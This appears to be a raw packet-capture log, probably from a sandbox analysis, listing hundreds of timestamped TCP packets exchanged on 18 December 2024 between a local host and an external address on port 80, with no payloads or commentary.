                                                                                                                                                              Dec 18, 2024 11:47:18.077150106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.077178955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.077198982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.077209949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.078279018 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.078351021 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.078860998 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.078916073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.079458952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.079483986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.079513073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.079519987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.080590963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.080636978 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.080641985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.080677986 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.081784010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.081818104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.082743883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.082787991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.083374023 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.083445072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.083467007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.083508015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.084135056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.084197044 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.084388971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.084439039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.085308075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.085383892 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.085407019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.085453033 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.086560011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.086574078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.086608887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.086627960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.087773085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.087786913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.087829113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.088859081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.088907003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.088912010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.088951111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.090610027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.090662003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.090692043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.090733051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.091258049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.091273069 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.091301918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.091325998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.092387915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.092430115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.092556953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.092596054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.093554020 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.093611956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.093686104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.093816996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.094691038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.094705105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.094733953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.094754934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.095828056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.095880985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.095976114 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.096010923 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.096991062 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.097033024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.097685099 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.097726107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.098217010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.098229885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.098267078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.099392891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.099406958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.099435091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.099550962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.100588083 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.100635052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.100665092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.100707054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.101741076 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.101754904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.101787090 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.101798058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.102848053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.102905035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.103606939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.103657961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.104060888 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.104074001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.104099035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.104152918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.105278969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.105324030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.105390072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.105431080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.106373072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.106422901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.106746912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.106790066 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.107518911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.107574940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.108095884 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.108140945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.108680010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.108701944 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.108728886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.108753920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.109839916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.109901905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.110018015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.110058069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.111027956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.111073971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.111496925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.111534119 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.112271070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.112284899 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.112318039 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.112330914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.113471985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.113521099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.113548994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.113590002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.114631891 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.114676952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.114993095 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.115058899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.115706921 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.115757942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.116467953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.116509914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.116894960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.116909027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.116935015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.116945982 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.118057966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.118112087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.118268967 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.118308067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.119206905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.119256973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.119293928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.119330883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.120376110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.120433092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.121032953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.121078014 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.121551991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.121591091 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.121680975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.121721029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.122708082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.122751951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.123208046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.123616934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.123900890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.123951912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.124090910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.124130011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.125037909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.125082970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.125158072 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.125297070 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.126239061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.126283884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.126364946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.126405954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.127403021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.127453089 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.127613068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.127655029 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.128513098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.128561974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.258199930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.258250952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.258274078 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.258291960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.258764029 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.258812904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.258966923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.259008884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.259586096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.259601116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.259634972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.260713100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.260761023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.260838032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.260883093 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.262036085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.262083054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.262425900 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.262470961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.263134956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.263183117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.263499022 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.263545990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.264245033 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.264292955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.264656067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.264715910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.265408039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.265454054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.265630960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.265675068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.266704082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.266717911 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.266765118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.266765118 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.267770052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.267782927 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.267836094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.268918991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.268933058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.268969059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.268990040 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.270147085 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.270160913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.270204067 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.271253109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.271303892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.271306038 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.271342993 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.272402048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.272476912 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.272572041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.272614002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.273576975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.273616076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.273781061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.273827076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.274769068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.274818897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.275234938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.275280952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.275913954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.275955915 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.276154041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.276199102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.277108908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.277151108 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.277189016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.277232885 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.278285027 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.278296947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.278340101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.279949903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.279963017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.279999018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.280615091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.280658960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.280924082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.280966043 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.281876087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.281923056 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.281929016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.281971931 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.283031940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.283082008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.283179045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.283221006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.284148932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.284194946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.284275055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.284317970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.285274982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.285320997 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.285406113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.285450935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.286478043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.286525965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.286580086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.286623955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.287611008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.287657976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.288372993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.288417101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.288821936 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.288872004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.288893938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.288937092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.289963007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.290019989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.290244102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.290293932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.291136026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.291184902 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.291429043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.291475058 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.292376995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.292423010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.292537928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.292613983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.293476105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.293524981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.293606997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.293646097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.294657946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.294708967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.295502901 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.295551062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.295806885 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:18.295852900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:18.296084881 CET804980631.41.244.11192.168.2.6
